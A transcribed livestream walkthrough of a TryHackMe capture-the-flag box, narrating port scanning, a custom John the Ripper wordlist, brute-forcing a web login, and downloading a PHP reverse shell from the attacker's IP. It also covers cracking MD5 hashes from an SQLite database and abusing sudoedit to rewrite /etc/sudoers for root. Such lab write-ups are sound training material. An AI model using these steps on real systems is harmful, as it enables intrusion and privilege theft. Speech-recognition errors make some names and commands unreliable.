and year of the pig. So let's go ahead and see what we got here. We got 3 flags here. Let's go ahead and grab that. And we'll start off with rust scan here. Rust scan on that IP address. So we got port 22 and 80 so far. Let's go and check out that port 22. Okay. Let's go and check out that port 80. And let's go ahead and head into that port 80 also. So we got Marco's blog. We got a guy named Marco maybe. Go ahead and echo Marco into user pass or users.txt. And let's go ahead and check out search exploit 2.4.29. We got local privilege escalation for the kernel. That's it. All right, and it is called Marco's blog. Doesn't look like we have DNS or anything like that. That's gonna make us do an Etsy host or anything like that. So he's made a blog about planes, all about planes. Let's look at maintenance. Alright, cool. So he's got a whole thing about planes here. Can't click on the picture or anything like that. He's got a couple planes in here, especially seaplanes. So I know everything there's know about planes, especially seaplanes. This guy like right here, my personal favorite. Alright, then we got something about Mach-E M5 fighters and the Curtiss R3C. I don't know. I just know about Ospreys. Alright, let's go ahead and start up a Fearox Buster on that thing. We'll do it down here. We'll use directory list 2.3 medium.txt. See if we get anything with that. Get anything back with that, like right there. We have a /admin, also /assets. We also should probably look at the source code for this thing too. Let's go ahead and look at that /admin. We also have an API. Let's go and look at all those. We're probably going to take a minute to open since we're doing this down here also. We also know that we're using JavaScript in here. API only accepts post requests, okay. That's forbidden assets. And then we have a login. Admin, let's try that. Not go anywhere just yet. Incorrect username or password, okay. Oh. Remember that password should be a member word followed by 2 numbers and a special character. Okay. Well, we know we got a Marco so far. Should be 2 numbers followed by a special character. How many characters long? Should be a memorable word. Followed by 2 numbers and a special character. The thing was called Pigs Sometimes Can Fly. Right? You're the pig, some pigs do fly. We have the sea landing plane back here, which he said was his favorite. I got an idea. We don't know how long it has to be, the password yet. I should probably actually I'll put that to a wordless, huh? Well, I think I already have a feeling of what we're working with here. So it has to be 2 numbers, right? That's what it said. Followed by 2 numbers of special character. Remember words followed by 2 numbers of special character. We have a seaplane in the beginning. It says that his favorite plane is the Savia S-21. So I'm thinking 21 is our number. Because we need 2 numbers. This one only has 1 number. This one only has 1 number. Well, I guess that's 0, like right there. I guess we could always put 21 and 30 and 03 behind everything. And a special character. We can look at the tax, the exclamation point, points. Since he gets really excited every single time, I mean, he's 1, 2, 3. Is that 4? Skies 4. There is 6 exclamation points in here. Source page didn't open up yet. Well, probably because of this, like right here. But I think we found our way in. I think we got Marco as a username. Nothing that's a comment. Well, we do have this Taylor. Text primary. Is that a type of text, I wonder? Is Taylor a type of plane? Nothing really in here. The API is not showing us anything. So let's... Okay, to see if he was down here anywhere. Let's try Marco. Okay. Let's do that Q again. Okay. So there's every word, right? Now let's go ahead and make sure that they're all sorted. Let's go ahead and do a... Is that how you do it, like right there? Or is it? Okay, so that's what we want, like right then. We want to output that to passwords.txt. And then we want to remove tech rf pass.txt. It's going cat passwords.txt. There's his supposedly favorite plane. Now let's make a rule in John the Ripper. So John the Ripper, you can make rules, and then you can make a word list off those rules. All right, so if we go to locate john.config. What? You should be there. Okay, let's go ahead and make a... Should be john.conf, is it? It might be john.conf. So we can make ourselves our own little word list in here and then call it whatever we want. So let's go ahead and do a sublime text on john.conf. Okay. And we can make ourselves a little, see, batch mode, word list, but we can make ourselves a little rule list. Not a word list, but a little rule list for it to go off of. No, I did not upload the boxes to Vault Hub. So we can say, where is list? List rules. Okay, I know that we can make something. What is it? List dot rules. There we go. Okay, there we go. So we can do a. My word list rules for Year of the Pig. Right? We can say list.rules. Okay. And then we can give it rules, right? And first we got to give it a name. So list.rules, and we'll call it pig rules. Okay. And then we're going to tell it what to do, right? So it said a special character followed by 2 numbers, right? So we're going to do a little $sign here. 0 to 9, I think. Like that is 0 to 9. It's probably 0 through 9. We're going to do another $sign here. 0 through 9. And then we're going to go ahead and we're going to do a like special characters kind of thing, right? So we're going to do another $sign. And we're going to do, let's say, exclamation point. Hey, thanks a lot for the follow, Alex Henrique Loke. All right. So we can do like an exclamation point, a comma, question mark, period, @ number sign, $sign. We'll do something like that. So we'll save this. Okay. That's saved. Now let's head back over to here and let's do a John. Let's CD back into Year of the Pig. Okay, we'll do a John Tatek word list equals, and we called it pigs or pig rules, right? No, we gotta give it our word list that we want. Passwords.text. Okay, that's the word list, right? And then tac rules equals pig rules. All right, I think we did like that. I don't know if we need to make it uppercase or whatever else. Let's go ahead and just make it exactly how we had it. Pig rules, right? So now we got pig rules there. std out. And then we got to say what password file to put it out to. Will that work? Yes. So we have a bunch of words here now, right? All with the special characters that we did, everything like that, right? Now, we need to go ahead and send those off. So we can use Burp Suite, Hydra, Zap, any number of things, right? So let's go ahead and open up Zap, because that's going to move a lot faster. Remember, you cannot use Zap in OSCP. Seemed to do something, didn't it? Seemed to do something. Okay, let's go ahead and start this. Automate scan for this IP address, right? We'll attack that. We should be able to see the login page over here. Hopefully. We'll attack that, and then we'll fuzz it. And right now, we have a username Marco. It's not showing the login, though. I want to see the actual login page. I really don't feel like using Burp Suite for this because that's going to take freaking forever. And we all know that trying to use Hydra is going to be a pain because of how you have to type it out. So, we active scan that guy? Start scan. See if we can get anything else. Can we go ahead and there's a way to be able to open up in browser. Open URL in system browser. That was super useful, like right there, huh? Oh, you just broke Kali. That's what you did. Okay, there it goes. Oh god, it's like breaking Kali. I want to actually log in. Firefox. There we go. If I type something in here, then it will come back and say, hey, we found something or no? Okay, so we got login.php now. There we go. So let's go ahead and attack fuzz that guy. Or maybe not. Okay, this thing's really pissing me off. We might have to use Burp Suite. Yeah, I think we're going to have to use Burp Suite. Can I fuzz this page? Man, I was really hoping we wouldn't have to get to this point. Oh! What's this? Can we attack this like right here? What'd you say the username was? No, let's just say it. There's a... No, that's just the... Never mind. Alright, looks like we're using Burp Suite. So let's go ahead and pop open Burp Suite. And I guess we're just going to throw Burp Suite at it. And we're going to be taking a minute, huh? What's absurd? Yeah, you can't use Zap on OSCP. Zap will like... It'll be like, hey, there's cross-site script like right here. We already did it for you. Send this payload. Like, oh, thanks. Thanks, Zap. This is the exact type of cross-site scripting that's right here. You know, look here to exploit it. Yeah, any tools that are actually useful in the real world, you can't use in So we had, what was his name? Marco. And we're going to go with, let's grep for his favorite plane. Let's start with that. Let's start with grepping for his favorite plane. And if that doesn't work, then we'll send the word list at it. So his favorite plane was the Savoia, right? Let's go and grab that first. And let's do a cat pass file.text grep tech I for that. And then I'll put that to sav.text. Cat sav.text. Okay, now we have everything that's like that, right? We should have both lowercase and uppercase ones like that. Well, no, it just... I only wanted that word. Okay, we do. Okay, but we only have uppercase. It didn't need an uppercase, didn't it? Let's go ahead and send that at it first. Any special character. Doesn't say anything about lowercase or uppercase. Crap. We might have to do the casing of this also. Let's go ahead and send this off at it first, then we'll see if we have to do casing with it. The base 64, the password, I take it? So we think it's Marco. We think Marco's good, right? So we'll clear that. We'll keep the password. We'll go ahead and we'll go to payloads. We'll load up. And we'll load home Cali, desktop, try hack me, year of the pig. And let's try sab.txt first. And let's go ahead and start that attack. And there's 700 different payloads that can be used in this thing. Oh, nothing's happened. Yeah, Burpsuit Pro's not allowed. Yeah, I use Zap in both ECPPT, EWPT, and EJPT. In ECPPT, it's not really going to do anything for you. Same thing with Nessus. Nessus is also allowed in those. This is going to be a minute, isn't it? This is going to be a minute. Here's my problem. Is that I don't think it's looking at it like this. Because remember when we got the password, it was hashed? I think it's looking at it as an MD5 hash, not as the password that we're sending. So I think we might have to hash every single one of those passwords. Which is not good. This could take forever. That's probably why it's hard. Because this will take forever. I think it might also be easier just to go with our first hunch of that Sylvia. Sylvia 21 and then something. We'll try that. Because how it's written, followed by two numbers, is a special character. So let's try Sylvia. Fucking 21. And we'll just work our way down the line. Exclamation point, @sign. Right now it's uppercase, right? Okay, let's try it lowercase. 21, exclamation point. Oh, you know username entered. Marco. And I just want to try this like real quick to see if it was our first hunch was correct. 21, exclamation point. Nope. So our first one was not correct of what we thought it was going to be. Either that or it's being hashed as it goes across. Which, if that's the case, how in the hell are we going to do this? Like right here. We could use what web? I mean, it's not. Say Apache's not vulnerable. I think I know the way in. I think I know exactly what to do here. I think I also put a space in there too. I also didn't put that S on the end either, but let's try it like this. There's also space in the last one. I just realized that. Let's fucking go! Alright, it was Sylvia 21 exclamation point lowercase. So you just gotta read about the person a little bit. That's all. See? Sylvia 21 exclamation point. That's all it was. Lowercase. You just gotta get to know the guy, you know? Listen to him. Commands. Can we execute whatever we want? Invalid command. Of course it was. Whoops. That was definitely a die. What are we allowed to execute? Everything's invalid. So no matter what I execute, going to be invalid. Reset password. Delete user, add user, landing PHP. Do you think he reused his password? Think he was dumb enough to do it? That is his favorite plane. You gotta stick with your favorite stuff, guys. Alright, so we think it is that. Okay. Yep. Echo Marco. Into user pass dot text. Sudo techo. Okay. Let's go ahead and do a CD and var or CD and var backups. Last stack LA, nothing in there. Let's go and cat SUID bits, SUID script, like right here that I got, and we'll cat for those capabilities. Try to find these and find some capabilities. See if we got anything on there. I didn't see tunneling in this one, so. Okay, not seeing anything strange in there. Okay, it was running PHP, so let's go back into var www.html. CD to admin, because we were never able to actually look in there, really, were we? Oh, we did get to admin, but. Okay. Now he's got to figure out where the hell to go from here. Because grab our first flag there. Okay. I can get into his directory, so CD into Curtis. I'm not allowed to read that. Let's go ahead and CD into tools. And Python 3, HP server. Let's go ahead and CD into temp. Okay. Let's go ahead and wget 10.13.26.184 slash limpeas.sh. No, I did not. No, I mean, I didn't take any notes now. There's nothing really to take notes on. We brute force the user. Nothing yet, at least. Take notes on, really. Sudo version's way out of date. Ooh. Is this Hack Me a Sandwich? Really? Okay. That's for 1.8.27. What do we have? 1.8.13. Huh. Okay. We could try it. Let's go ahead and try this guy real quick. Verify too. So it actually works. Hack Me a Sandwich. That was a sudo hack. Also, if I actually cd into tools, cd, is it Hack Me a Sandwich? Let me go ahead and locate hacks. Or let me just locate sandwich. What? It hacks me like that? Yep. Root everything. Sudo hacks me a sandwich. It's a sudo vulnerability that came out a couple of years ago. It's a huge vulnerability. It was really bad. Came out a few years ago. Huh. Let's go ahead and do a nano. What do they call this again? You call this deathstar.c. Okay. Did it actually save? Yes, it did. All right, let's go ahead and do a GCC on it. It's somewhere in here. Remember seeing it? There we go. The Death Star. And we'll go ahead and try to run this Death Star. I think that's Hacks Me a Sandwich. But this one, like right here, supposedly works on this one, like right here. So Wonder if I could do it without compiling it on that one. If I could move it over and run it like that. Wonder if I could do that on this one over here. /destar.c. I don't know why I just did that. Okay, Destar's in there now. We're going to run our Python server and we want to get Destar. He did not get that. Probably because I didn't even tell it to W yet, huh? Don't think it's going to work. Ah. I think there's no GCC on it, so we can't do that one. Alright. Is there a GCC binary? Now I just want to kind of try this one. This is obviously not the way up, but can we like put GCC on there? Because that's a lot of crap to put on there, huh? I'm trying to put GCC on there. Alright. Let's go ahead. Let's keep trying. See what else is under. See if there's any we could do Hacks Me a Sandwich, though. We could always try that. Okay, not really seeing anything in here. Let's go and try that Hacks Me a Sandwich one. Let's see if make is on here. Is make on here? Damn. We need make on there for this one to work also. Okay. Alright, so we don't have make either. Okay, so what the hell? What do we do then? Okay. CD into var, www. CD back into admin. You know what I haven't seen is a database anywhere. And there's obviously a database on here somewhere. You know what I'm saying? I wonder for Curtis if we're going to be higher. I wonder if we can reset a password. Login.php. Huh. What was that file called? Wasn't it called? Oh, command, not config. So you throw that in admin. Yeah, I will here in a second, but I think I just thought of something. Like right here. I want to put this guy onto there, so I want him to be in commands. I want to put right now I'm a web developer. Why am I a web developer? I can put stuff into this thing, right? What I want to do is you know what we could do? Desktop, try hack me. I got an idea. Alright. So let's go ahead and do a Python 3 tech m http.server 888. We're going to do a wget. I have an idea. 10.10.54.6. Command.php. Focus is not found. So right, isn't it commands.php? Isn't that what this file is called? Oh, 888. 100% correct. Was not found. No, because reset password, we have to reset it for Marco. Or for the other one. There's another one on here. What the hell's his name? We have to reset it for Curtis, but we can't just reset it for Curtis. What's up, I work at McDonald's. How you doing? Hey, thanks for the follow, Zemanazga. So what I'm thinking is that we echo a command into there, get a shell back to us, right? When we get the shell back, we're still going to be www data. I don't know if that's going to work or not. What I'm trying to do. We need to find a database. That's what we need to do. There has to be a database on this thing somewhere. Oh, I found a database. Oh. Actually, okay, good. We're good. Cool. Sublime fucking... Sublime, yeah, we crushed it. We crushed that problem. There we go. Alright, so. We want to get rid of all of this and just echo back I was just going to say else if command equals I think we want to get rid of all that. I think. I think we do. So let's just go ahead and I want to overwrite one of the commands. So I'm thinking all we need to do is just do a like an ecosystem command. We're not already admin. How are we admin? What? That's not admin. We're a web developer. We're not admin. All right. No, you know what we can do? I got an idea. We're a web developer, right? Let's cd into admin. Cd HTML. Cd into admin. And let's do this. Let's make a... This ain't too bad. It's not too hard yet. Cd into tools. Cat shell.php. Let's go ahead and make sure that that's correct. Is it 10.13.26.24? No, it's not. Nano shell.php. Let's go ahead and make this 10.13.26.24. It's on port 1111. Okay. Let's go ahead and do a desktop try hack me or the pig. We're going to go ahead and do a netcat or a Python 3 web server. Oh, sorry there. Nope. Okay, there we go. And we'll do a wget http 10.13.26.184/shell.php. Oh, probably because it's sitting in tools, isn't it? Sorry. I was right the first time. There. Okay. Now if we go to shell.php, 111, we should get a reverse shell from www.data, which then means that we can read that admin database. Should. If we turn off Burp Suite, maybe. Now we should be www.data. Okay, we are. Now we get ls-la, cd into var www, and then we can grab that admin database, like right there, right? So now we can grab the admin database and bring that back to us. So let's go ahead and do a, or we can just cat the SQL. Let's go ahead and get a full shell first. Was it Python 3 that's on here? Yeah. So cat scripts full shell. Export term equals x term. stty. Rows is 20. Columns is 85. I mean, yeah, he's the admin for the website, but that's it. It just said welcome admin for his website. He's not the admin on the box, though. On the actual machine itself, he's not. So let's go ahead and do a... Okay, so now I need help again. And I think I have SQLite. No, I don't. I don't know any damn commands for SQLite. I thought I had something about databases in here. Databases, I got Mongo. Is it the same thing as Mongo? Show databases? You guys do that? No. Okay. So I've done this before. I just didn't take notes, huh? Of course. Hey, Tom, just the guy. Yeah, he was just the admin on that thing. That's all. Okay, so first we got to open it. Okay, so let's go ahead and actually start taking some notes on this thing, huh? Databases, and this one is SQLite. Okay, so I think I'm already in the database. Don't think we need to do that part because we already did that, right? Dot help, dot database. Okay, that works. Okay. What else do we got here? Sorry, I'm gonna be like taking a lot of pictures of this stuff because it is not the MySQL database. Attach database, boom, as whatever. Okay, so now we have to attach database. Attach database. That as admin. So one more time. Then we have to put this in quotes. Okay. Dot databases. Okay. All right, well, yep. So we got main and we got admin now. And they're both saying that damn thing. So we just want to look into main. Okay. Exit. That was good. Show tables. There. Thank you. Dot tables. This is actually not as difficult as I thought it was going to be. Is it dot columns after that? I guess. Attach tables. And then we attach that table and we go with. Okay, how the hell do I dump a table? Can I like attach a table? Do I dump a table? What do I do here? Can I just like schema it? Did I just say like, or can I just do like a dot full schema? Well, we know the schema now. That's good. Okay. Let me go ahead and highlight the two that I did like right there. I did tables and I did dot full schema. Those are two commands like right there that I did. So we know how it's broken down now. Now, how do I use a table? Do I say like schema users? Dot schema users? Okay. We're getting somewhere. I think. Can I do like a select star from users? Is that a thing in this? Anyone know? They are weird. They are very weird. But we're getting there. We're getting through it. I wonder if I could just do like a select star from users. You know what I'm saying? Like that'll make our life easy, right? Most of them allow you to do some of that. Select star from users. Wha-bam! I don't know which size is password, but wha-bam! Alright, we crushed it. I don't know what the hell to do with that. I don't know which size his password is. We go with this side. Who are we for? We're Marco now. We want to become Curtis, right? So we have a password, I think. I think we do. I don't know what the hell it is, but let's throw it into John and see if he knows what it is. John always knows. All right, John. Let's try that side. John has no idea what it is. He has no clue. He thinks it's an LM. It's not an LM hash, John. We know that much. Can we just... Maybe it's raw MD5? Probably raw MD5, huh? Let's go! Let's freaking go! Copy that. Okay. Now let's go ahead and throw that into here. We're just going to say this. All right, let's go. Just to make sure that, yes, they really were MD5 hashes. Cool. I could use Crack Station also. Could try that. But let's go ahead and throw this guy into here. And let's do an SU into Curtis. With that. Can we do that like right there? Oh, whoops. And let's go ahead and do a Echo Curtis into user pass.text. Let's go ahead and actually do that because I don't remember. Okay. Okay. So sudo tech L for Curtis. So we can run sudo edit. Okay. Every user on here. How do I sort it by tools? I'm not really sorting it by tools. I just say like, hey, databases. This is cherry point. So I'm just saying like, hey, this is all the Active Directory stuff that I do and things like that. By port knocking, Hydra stuff, port 4 stuff, databases. So I just want databases. I'm just making a database one now. Yeah, I'm grabbing it. Okay, so what was that sudo tech L again? Whoops. Okay, so we can run sudo edit for that. What can we do with sudo edit? Let's go to GTFO bins and see. Let's find out. Nobody knows what we can do with sudo edit. Obviously do something with it. Through path manipulation. Okay. I think that's what we're going to be doing since it's going just to a star. Think those were the easy flags? I mean, the last thing is just privesc. Privesc is actually usually one of the easier things to do is privesc. So what we should be able to do is it has 2 stars in there. So this is what I'm thinking. Let's cd into var www.html. And we will make directory priv cd make directory priv cd. Oh. Okay, that's okay. You know why? Oh, bam. Shit. Did I exit out of sight? How do I quit this thing? Quit? Should have paid. Oh, was it period exit? Yes. Okay. CD into HTML. Make directory. Priv. CD into priv. Make directory. Priv1. Or priv2 or whatever. Okay, now from up here, CD into slash. Or priv1. And then priv2. Because we got 2 stars there, right? And then it runs config.php. So let's go ahead and do a echo bin bash into config.php. Right? Hey, Christy, how you doing? End of file? GTFO business doesn't have anything for sudo edit. Alright, so from here, since we have bin bash and config.php, we should, I think, technically be able to just run it. Wait. Yeah, we should just be able to run var. Or let's go ahead and see where's sudo edit at. How about that? It's probably like bin bash something. Yeah, so let's go into user bin. Let's cd into user bin. And we are going to run a sudo edit. Slash config.php. Did not quite work the way I wanted it to. If I can do that. What if we can run sudo edit No, we can't run on Etsy sewer. We can order right there. Yeah, I'm trying to get it so that it runs this file like right here. But how would we do that? I mean, there should be a pretty simple way to do this, but it keeps going into Vim. I don't want it to go into Vim. I want it to actually run that file. So we should be able to do a sudo edit, right? From there, or sudo edit, we need to be able to run the file. So we want that file to actually run. We're going to the correct path now. What is it? Is it? Is it the other way around? Oh, I'm here. CD into var. I know what to do. Var www HTML. Priv. I have an idea. Okay, now Etsy sudoers. It is possible, but I don't think it's going to do anything for us. Etsy sudoers is now within config.php. So, what I'm thinking we do is we do a sudo edit now on this. And we should be in Etsy sudoers. Let's go! Okay, now we're in Etsy sudoers. Now we can add ourselves. Well, I can't do anything with it. There we go. Curtis. All equals all. All. Okay. So now we should technically just be able Oh, I like that. That was fun. We're writing that one down. That was pretty cool. That was pretty freaking cool. That was fun. Okay, so there's that, right? There's that. Then from there, we see this. And from there, we edited it right with sudo edit. We did that, and then we did var www html priv2 config.php, which then brought us into this sudoers file. So that's allowed us to edit this here. Nice. No, we won't be able to run sudo edit because we can't run that. We can just run sudo edit. If we were able to run, ready, watch. I feel like sudo edit is going to give us problems. Sudo edit. Okay. Var www HTML priv2. Well, I don't know anymore because now we are actually been bashed. I feel like sudo edit is going to give you issues though. Now we won't know because we're already in sudo bash. So we can already do all. But let's go ahead and grab that root flag. We'll come back and we'll try it. So let me go ahead and sudo su. Hey, thanks a lot for the follow, RackX. Alright, let's go ahead and try this. For anyone that's following today, I'm leaving soon, so I won't be online till about... Hey, thanks a lot for follow, Jack here. So I won't be online again until around Thanksgiving. Alright, so let's go ahead and let's do a... Oh god, oh god, oh god, I'm losing it. Hey, thanks a lot for the follow, SS Alpha Streamer. Alright, let's go ahead and let's get rid of him there for the all, right? Okay, so I can no longer learn that, right? So we can still run this. Alright. So what you're saying is to do a... By the way, what if we only run the sudo edit spawn a bin bash shell? So we could try sudo... Let's try sudo edit first. Nope. But I could just do a sudo edit. Because I think what is happening... is it's calling for sudo and sudo again. No, not going back home. Nowhere near there. If I was going back home, I have internet. Well, we could use the whole command, but if look at I can call sudo edit. But I can't call sudo edit. We can do a sudo edit. var www HTML priv2 config.php. Nope. Because I think it has to do with the sudo within sudo edit. So that's why I don't think it works, because you got to do a... It has to be... there's something going on with sudo edit. It's already running sudo, so trying to run sudo twice, saying no. So that's why I don't think that will ever... We should have at least got something back. We should have got the same thing back as this before. If that would work. Alright.